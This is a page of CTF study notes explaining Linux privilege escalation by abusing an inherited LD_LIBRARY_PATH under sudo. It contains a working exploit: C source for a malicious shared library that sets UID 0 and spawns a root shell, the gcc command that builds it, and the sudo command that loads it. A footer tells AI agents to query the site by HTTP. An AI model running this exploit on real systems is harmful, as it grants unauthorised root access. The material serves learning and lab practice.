# LD\_LIBRARY\_PATH

Programs running via sudo can inherit variables from the environment of the user. If the **env\_reset** option is set in the **/etc/sudoers** config file, sudo will run the programs in a new, minimal *environment*. The **env\_keep** option can be used to keep certain environment variables from the user’s environment. The configured options are displayed when running **sudo -l**.

The **LD\_LIBRARY\_PATH** is inherited from the user's environment. The **LD\_LIBRARY\_PATH** contains a list of directories which search for shared libraries first. 

### Steps

#### Investigate the sudo-able programs and the libraries used. 

{% code overflow="wrap" %}

```bash
# Check if you see any sudo configuration for your usrname
sudo -l
```

{% endcode %}

<figure><img src="/files/yVbRqAKQEX3AtGhXuvAc" alt=""><figcaption></figcaption></figure>

```bash
# Check if you have libray for the programs. In this case, apache2
ldd /usr/sbin/iftop
... 
ldd /usr/sbin/apache2
```

<figure><img src="/files/anApoTLeQKR0I3vlskW9" alt=""><figcaption></figcaption></figure>

#### Compile the following code and make it so library.

```c
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
        unsetenv("LD_LIBRARY_PATH");
        setresuid(0,0,0);
        system("/bin/bash -p");
}
```

```bash
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
```

#### Execute to escalate the privilege

<figure><img src="/files/fngRPKzTExiU5KjwjG16" alt=""><figcaption></figcaption></figure>

```bash
sudo LD_LIBRARY_PATH=/tmp apache2
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/linux-priv/sudo/ld_library_path.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.